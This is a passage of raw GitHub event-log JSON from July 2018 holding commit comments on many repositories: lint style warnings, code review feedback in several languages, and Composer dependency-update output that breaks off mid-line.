^\n```\n[tests/testthat/test-spread2.R:884:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L884) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       spreadProb = 0.23, persistProb = 0, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:886:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L886) *style:* **Lines should not be more than 100 characters.**\n```r\n​                      spreadProb = 0.23, persistProb = 0.8, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:891:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L891) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  M <- matrix(0.8, nrow = 50, ncol = 50)\n  ^\n```\n[tests/testthat/test-spread2.R:898:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L898) *style:* **Put spaces around all infix operators.**\n```r\n​  start <- c(50, length(landscape)-49)\n                                 ~^~\n```\n[tests/testthat/test-spread2.R:902:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L902) *style:* **Lines should not be more than 100 characters.**\n```r\n​                        spreadProb = 0.23, persistProb = persistRas, iterations = 10, directions = 8L,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:916:14:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L916) *style:* **Use <-, not =, for assignment.**\n```r\n​  spreadProb = landscape\n             ^\n```\n[tests/testthat/test-spread2.R:918:72:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L918) *style:* **Commas should always have a space after.**\n```r\n​  expect_silent(spread2(landscape = landscape, spreadProb = spreadProb,start = start,\n                                                                       ^\n```"}},"created_at":"2018-07-05T17:39:19Z"}
{"id":"7924630132","type":"CommitCommentEvent","actor":{"login":"astonzhang"},"repo":{"name":"mli/gluon-tutorials-zh"},"payload":{"comment":{"id":29610234,"position":23,"line":21,"path":"chapter_introduction/how-to-use.md","commit_id":"167443d1c5e33613747244d0e50dd5995de2174b","created_at":"2018-07-05T17:39:22Z","updated_at":"2018-07-05T17:39:22Z","author_association":"COLLABORATOR","body":"这个颜色是测试过的，印黑白能区分"}},"created_at":"2018-07-05T17:39:22Z"}
{"id":"7924632209","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"mozilla/application-services"},"payload":{"comment":{"id":29610239,"position":11,"line":11,"path":"docs/sync/state-machines.md","commit_id":"48729df65e5d26187b39ed31518e076ffb11f18f","created_at":"2018-07-05T17:39:50Z","updated_at":"2018-07-05T17:39:50Z","author_association":"MEMBER","body":"Can we also push the `.graffle` files to the repo?  It looks non-trivial to convert Omnigraffle to something that doesn't require special tooling, but at least we should support the next person who might want to edit them."}},"created_at":"2018-07-05T17:39:50Z"}
{"id":"7924633425","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610242,"position":85,"line":85,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:40:06Z","updated_at":"2018-07-05T17:40:06Z","author_association":"NONE","body":"while not filename[0].isalnum()\r\npython style prefers not comparing with True/False and testing the variable, function return directly.\r\nFilenames can start with numerics so no need to trim them. To guarantee a valid filename would need to check every character, might be string functions for filtering strings to specific charsets rather than implementing via loop"}},"created_at":"2018-07-05T17:40:06Z"}
{"id":"7924635155","type":"CommitCommentEvent","actor":{"login":"nadiaya"},"repo":{"name":"awslabs/amazon-sagemaker-examples"},"payload":{"comment":{"id":29610246,"position":null,"line":null,"path":null,"commit_id":"6283c4090132101bd33c3bfebde2af8d124ac280","created_at":"2018-07-05T17:40:27Z","updated_at":"2018-07-05T17:40:27Z","author_association":"COLLABORATOR","body":"@gurumurthys thank you!"}},"created_at":"2018-07-05T17:40:27Z"}
{"id":"7924637967","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610252,"position":96,"line":96,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:41:05Z","updated_at":"2018-07-05T17:41:05Z","author_association":"NONE","body":"debug level is for additional diagnostic information. A download failure would either be a warning or error depending on the impact. This is likely a warning."}},"created_at":"2018-07-05T17:41:05Z"}
{"id":"7924638749","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610254,"position":95,"line":95,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:41:15Z","updated_at":"2018-07-05T17:41:15Z","author_association":"NONE","body":"Exception too broad"}},"created_at":"2018-07-05T17:41:15Z"}
{"id":"7924641904","type":"CommitCommentEvent","actor":{"login":"brandonkane"},"repo":{"name":"facebook/facebook-python-business-sdk"},"payload":{"comment":{"id":29610259,"position":null,"line":null,"path":null,"commit_id":"e2f279a62b7e6c7fd30a080b4be8103c7303a715","created_at":"2018-07-05T17:41:58Z","updated_at":"2018-07-05T17:41:58Z","author_association":"NONE","body":"@vicdus @ellentao - There have been several of these updates, with new releases in PyPI but without a release tag in the github repo.  Would be great to get a release tag for every release, as well as an update to the latest release so people visiting here know what the current version should be."}},"created_at":"2018-07-05T17:41:58Z"}
{"id":"7924647050","type":"CommitCommentEvent","actor":{"login":"dodekeract"},"repo":{"name":"3YOURMIND/kotti"},"payload":{"comment":{"id":29610272,"position":152,"line":123,"path":"packages/kotti-table/src/Table.vue","commit_id":"276b2c80bfb3be7cb7cecf2965f65702c23e629b","created_at":"2018-07-05T17:43:08Z","updated_at":"2018-07-05T17:43:08Z","author_association":"MEMBER","body":"@ostoc"}},"created_at":"2018-07-05T17:43:08Z"}
{"id":"7924648053","type":"CommitCommentEvent","actor":{"login":"dodekeract"},"repo":{"name":"3YOURMIND/kotti"},"payload":{"comment":{"id":29610273,"position":115,"line":104,"path":"packages/kotti-table/src/Table.vue","commit_id":"276b2c80bfb3be7cb7cecf2965f65702c23e629b","created_at":"2018-07-05T17:43:20Z","updated_at":"2018-07-05T17:43:20Z","author_association":"MEMBER","body":"@ostoc"}},"created_at":"2018-07-05T17:43:20Z"}
{"id":"7924648856","type":"CommitCommentEvent","actor":{"login":"ankane"},"repo":{"name":"ankane/jetpack"},"payload":{"comment":{"id":29610277,"position":null,"line":null,"path":null,"commit_id":"dffe581a40b2f52b186410109d7b959d46bce764","created_at":"2018-07-05T17:43:31Z","updated_at":"2018-07-05T17:43:31Z","author_association":"OWNER","body":":man_facepalming:"}},"created_at":"2018-07-05T17:43:31Z"}
{"id":"7924649064","type":"CommitCommentEvent","actor":{"login":"shaunsmith"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29610278,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-05T17:43:34Z","updated_at":"2018-07-05T17:43:34Z","author_association":"MEMBER","body":"This takes us back to whole Dev vs. Ops discussion.  Should a developer even be defining triggers or should they just be writing functions and publishing them to a repo with Ops deploying, configuring, and exposing (via triggers) functions.  I'm firmly of the belief that config properties should not be in func.yaml as they are most likely environment specific.  But on triggers I'm not so sure and lean towards letting the developer of a function define how it is exposed by default in a given application in the func.yaml.  Of course Ops could add/update/delete any trigger after deployment so having a trigger defined in func.yaml doesn't tie their hands."}},"created_at":"2018-07-05T17:43:34Z"}
{"id":"7924649972","type":"CommitCommentEvent","actor":{"login":"jakewhiteley"},"repo":{"name":"snapwp/snap-core"},"payload":{"comment":{"id":29610280,"position":null,"line":null,"path":null,"commit_id":"b4e4666a28bfa9c3632eec52855caed593cfa038","created_at":"2018-07-05T17:43:46Z","updated_at":"2018-07-05T17:43:46Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [test parent](https://trello.com/c/9pEpGbDm/1-test-parent)"}},"created_at":"2018-07-05T17:43:46Z"}
{"id":"7924653262","type":"CommitCommentEvent","actor":{"login":"carlasp"},"repo":{"name":"awsdocs/iam-user-guide"},"payload":{"comment":{"id":29610287,"position":5,"line":26,"path":"doc_source/access_policies_managed-versioning.md","commit_id":"8744a2883f6b12425a614650327fe7283422f12d","created_at":"2018-07-05T17:44:28Z","updated_at":"2018-07-05T17:44:28Z","author_association":"CONTRIBUTOR","body":"Hi, @copumpkin. Thanks for your note.\r\n\r\nIt’s not an exception. The permissions that are required to set the default version of a policy correspond to the AWS API operations for the task. That is, as with most AWS permissions, there is a 1:1 mapping of the permissions action to the API operation. \r\n\r\nIn this case, the iam:CreatePolicyVersion action allows you to create a new version of the policy and to set that version as the default. The iam:SetDefaultPolicyVersion action allows you to set any existing version of the policy as the default. These are two separate API operations.\r\n\r\nThe problem was that several customers didn’t realize that you can set a policy version with the CreatePolicyVersion API operation, and have contacted AWS Support. They reported that they denied access to the iam:SetDefaultPolicyVersion action and can’t figure out why they can still set a new policy as the default version. We added some clarification around the issue. \r\n"}},"created_at":"2018-07-05T17:44:28Z"}
{"id":"7924655665","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29610295,"position":null,"line":null,"path":null,"commit_id":"e66a1a7c0c9f5a44857ab41afea935cb79a196f2","created_at":"2018-07-05T17:45:03Z","updated_at":"2018-07-05T17:45:03Z","author_association":"NONE","body":"This is a really huge elo loss! It seems I tremendously underestimated the importance of the various stats bonuses/penalties. I never cared to take a closer look at this part of the code. Definitely something I will do in the coming days."}},"created_at":"2018-07-05T17:45:03Z"}
{"id":"7924656201","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29610298,"position":null,"line":null,"path":null,"commit_id":"1a417819cb22d515a20bc5ba42da2ac36d14f405","created_at":"2018-07-05T17:45:10Z","updated_at":"2018-07-05T17:45:10Z","author_association":"MEMBER","body":"Agree. I need to switch mindset a bit :) This above is a theoretical fix on request but I am pretty sure it works."}},"created_at":"2018-07-05T17:45:10Z"}
{"id":"7924657098","type":"CommitCommentEvent","actor":{"login":"colinta"},"repo":{"name":"ello/android"},"payload":{"comment":{"id":29610308,"position":19,"line":52,"path":"app/src/main/java/co/ello/android/ello/views/stream/PostImageCell.kt","commit_id":"eea727022163edfe050b3a05b721decf32521c70","created_at":"2018-07-05T17:45:21Z","updated_at":"2018-07-05T17:45:21Z","author_association":"CONTRIBUTOR","body":"Old habits die hard! (Don’t need the semi colon here)"}},"created_at":"2018-07-05T17:45:21Z"}
{"id":"7924657956","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610312,"position":18,"line":18,"path":"results.rb","commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T17:45:32Z","updated_at":"2018-07-05T17:45:32Z","author_association":"NONE","body":"1. посмотри мой комментарий к этому методу в прошлой сдаче - он остается актуальным\r\n2. методы которые ты используешь: `loose`, `win`, `draw`, `continue`...  они определены в модуле `Winner`, но ты его сюда явным образом не включаешь... как будет тот, кто читает твой код, догадываться где их искать ?\r\n3. имя файла и имя модуля опять не совпадают"}},"created_at":"2018-07-05T17:45:32Z"}
{"id":"7924660570","type":"CommitCommentEvent","actor":{"login":"SteveGerr"},"repo":{"name":"SteveGerr/Wadding"},"payload":{"comment":{"id":29610325,"position":null,"line":null,"path":null,"commit_id":"2f26962a0d2b96f42d44cda18038f1745524d060","created_at":"2018-07-05T17:46:07Z","updated_at":"2018-07-05T17:46:07Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-05T17:46:07Z"}
{"id":"7924663399","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610338,"position":18,"line":18,"path":"results.rb","commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T17:46:41Z","updated_at":"2018-07-05T17:46:41Z","author_association":"NONE","body":"зачем вообще было разносить эти методы на два модуля ?... не очень понимаю"}},"created_at":"2018-07-05T17:46:41Z"}
{"id":"7924666164","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"canmet-energy/necb_archtypes_generator"},"payload":{"comment":{"id":29610344,"position":null,"line":null,"path":null,"commit_id":"2b65d8ea62beba3f3817819a3f64c10125c648cf","created_at":"2018-07-05T17:47:20Z","updated_at":"2018-07-05T17:47:20Z","author_association":"CONTRIBUTOR","body":"https://github.com/canmet-energy/btap_tasks/issues/105"}},"created_at":"2018-07-05T17:47:20Z"}
{"id":"7924667388","type":"CommitCommentEvent","actor":{"login":"colinta"},"repo":{"name":"ello/android"},"payload":{"comment":{"id":29610351,"position":null,"line":null,"path":null,"commit_id":"c214f866e8e5ac3b2a2b3befa6cf38f620b923bc","created_at":"2018-07-05T17:47:36Z","updated_at":"2018-07-05T17:47:36Z","author_association":"CONTRIBUTOR","body":"You can remove this tmpToken stuff when you’re done."}},"created_at":"2018-07-05T17:47:36Z"}
{"id":"7924667587","type":"CommitCommentEvent","actor":{"login":"meijeru"},"repo":{"name":"red/red"},"payload":{"comment":{"id":29610353,"position":null,"line":null,"path":null,"commit_id":"963ec55a6bab860f8b259246f794bde6ea0172be","created_at":"2018-07-05T17:47:39Z","updated_at":"2018-07-05T17:47:39Z","author_association":"NONE","body":"Line 735 of `%red.r` says s.th. like `if mode = 'help [print read-cache %usage.txt]` so there one could do the extraction easily enough. It is then not a build step but a little bit of extra Rebol (later, Red) code."}},"created_at":"2018-07-05T17:47:39Z"}
{"id":"7924667636","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29610354,"position":null,"line":null,"path":null,"commit_id":"f90d72e3d27c3094674a9a5d8093c4549062c7ed","created_at":"2018-07-05T17:47:39Z","updated_at":"2018-07-05T17:47:39Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-47](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-47).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-47-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-05T17:47:39Z"}
{"id":"7924670871","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610370,"position":101,"line":101,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:48:19Z","updated_at":"2018-07-05T17:48:19Z","author_association":"NONE","body":"Not always csv, change var name, path join takes a list, no need to call twice"}},"created_at":"2018-07-05T17:48:19Z"}
{"id":"7924673802","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610382,"position":3,"line":3,"path":"winner.rb","commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T17:48:59Z","updated_at":"2018-07-05T17:48:59Z","author_association":"NONE","body":"как название модуля связано с методами, которые он содержит ?\r\nплохо прослеживаю логику...\r\n"}},"created_at":"2018-07-05T17:48:59Z"}
{"id":"7924674776","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610383,"position":103,"line":103,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:49:11Z","updated_at":"2018-07-05T17:49:11Z","author_association":"NONE","body":"Unless this delay is necessary to finish writing the file safely don't sleep here. If this delay is part of rate limiting handle it further up the call stack"}},"created_at":"2018-07-05T17:49:11Z"}
{"id":"7924679961","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29610392,"position":null,"line":null,"path":null,"commit_id":"07829ff78b5e0ae3a41bc03b338028b3ea541b45","created_at":"2018-07-05T17:50:21Z","updated_at":"2018-07-05T17:50:21Z","author_association":"MEMBER","body":"on the property/simpleproperty expression part: simpleproperty can only return a single thing (per object) so it's not suitable here, and propertyexpression would be inefficient because it calls getArray on the expression for you but I don't need the actual values held in the variable"}},"created_at":"2018-07-05T17:50:21Z"}
{"id":"7924682273","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610398,"position":19,"line":19,"path":"winner.rb","commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T17:50:50Z","updated_at":"2018-07-05T17:50:50Z","author_association":"NONE","body":"уже написал про это в классе Игрок - плохая практика - прямое изменение аттриубута снаружи класса\r\n"}},"created_at":"2018-07-05T17:50:50Z"}
{"id":"7924685935","type":"CommitCommentEvent","actor":{"login":"andywer"},"repo":{"name":"andywer/laravel-js-localization"},"payload":{"comment":{"id":29610406,"position":null,"line":null,"path":null,"commit_id":"14b7fa019e7cd7df7571637aa6c2fbe2a3fd4b01","created_at":"2018-07-05T17:51:36Z","updated_at":"2018-07-05T17:51:36Z","author_association":"OWNER","body":"Ahhhh 🙃 Would you mind opening a PR?"}},"created_at":"2018-07-05T17:51:36Z"}
{"id":"7924686064","type":"CommitCommentEvent","actor":{"login":"FoxMcloud5655"},"repo":{"name":"Azanor/thaumcraft-beta"},"payload":{"comment":{"id":29610407,"position":415,"line":1672,"path":"en_us.lang","commit_id":"ed2cecc0d2f309e590f7f42bc2813be1e14e53cd","created_at":"2018-07-05T17:51:38Z","updated_at":"2018-07-05T17:51:38Z","author_association":"NONE","body":"Yes, this needs to be fixed here!"}},"created_at":"2018-07-05T17:51:38Z"}
{"id":"7924689048","type":"CommitCommentEvent","actor":{"login":"nmathewson"},"repo":{"name":"torproject/tor"},"payload":{"comment":{"id":29610420,"position":null,"line":null,"path":null,"commit_id":"c8ccd028a78d154c3b82138f7827aec0e2de13dd","created_at":"2018-07-05T17:52:17Z","updated_at":"2018-07-05T17:52:17Z","author_association":"CONTRIBUTOR","body":"Thanks!  I'll use the variant with an underscore instead, though, since msdn says that the unprefixed versions are deprecated.  Tried to fix this with fecb8214d5e95ad605e8b0d431bc332e07f2ad3f."}},"created_at":"2018-07-05T17:52:17Z"}
{"id":"7924691882","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610427,"position":9,"line":9,"path":"App.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T17:52:53Z","updated_at":"2018-07-05T17:52:53Z","author_association":"NONE","body":"Ставь enter-ы между такими вещами"}},"created_at":"2018-07-05T17:52:53Z"}
{"id":"7924692168","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29610428,"position":5,"line":5476,"path":"easylist/easylist_specific_block.txt","commit_id":"62a5e38447747aa4cf1ee3a67ad059b0477f0d24","created_at":"2018-07-05T17:52:57Z","updated_at":"2018-07-05T17:52:57Z","author_association":"CONTRIBUTOR","body":"@ryanbr They embed mining script in this whitelisted file.\r\n\r\n- http://i.imgur.com/iswWwEq.png\r\n- https://github.com/hoshsadiq/adblock-nocoin-list/issues/265\r\n"}},"created_at":"2018-07-05T17:52:57Z"}
{"id":"7924692713","type":"CommitCommentEvent","actor":{"login":"haojin2"},"repo":{"name":"mli/gluon-tutorials-zh"},"payload":{"comment":{"id":29610432,"position":23,"line":21,"path":"chapter_introduction/how-to-use.md","commit_id":"167443d1c5e33613747244d0e50dd5995de2174b","created_at":"2018-07-05T17:53:04Z","updated_at":"2018-07-05T17:53:04Z","author_association":"CONTRIBUTOR","body":"好的"}},"created_at":"2018-07-05T17:53:04Z"}
{"id":"7924692749","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610433,"position":155,"line":155,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:53:04Z","updated_at":"2018-07-05T17:53:04Z","author_association":"NONE","body":"Use warning"}},"created_at":"2018-07-05T17:53:04Z"}
{"id":"7924693319","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610436,"position":158,"line":158,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:53:11Z","updated_at":"2018-07-05T17:53:11Z","author_association":"NONE","body":"Use warning"}},"created_at":"2018-07-05T17:53:11Z"}
{"id":"7924695165","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610439,"position":11,"line":11,"path":"bank.rb","commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T17:53:35Z","updated_at":"2018-07-05T17:53:35Z","author_association":"NONE","body":"правильней будет создать не модуль, а класс\r\nсоздавать в игре инстнас этого класса, который будет отвечать за хранение денег текущей игры и их обращение\r\nподумать какие операции с банком игры требуются и написать соответствующие методы"}},"created_at":"2018-07-05T17:53:35Z"}
{"id":"7924696450","type":"CommitCommentEvent","actor":{"login":"greg-1-anderson"},"repo":{"name":"pantheon-systems/example-wordpress-composer"},"payload":{"comment":{"id":29610442,"position":null,"line":null,"path":null,"commit_id":"ce9e1ade5319c8da7e756f83d309ac5b930b1e5e","created_at":"2018-07-05T17:53:51Z","updated_at":"2018-07-05T17:53:51Z","author_association":"MEMBER","body":"Update Composer dependencies (2018-07-05-17-53)\n\n```\nLoading composer repositories with package information\n\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.9.7)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.9.6)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.9.5.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.9.5)  \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.9.4)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.9.3)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.9.2)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.9.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.9)  \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.8.3)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.8.2)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.8.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.8)  \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.7.5)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.7.4)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.7.3)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.7.2)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.7.1)\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer (4.7)  \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bReading composer.json of pantheon-systems/wordpress-composer 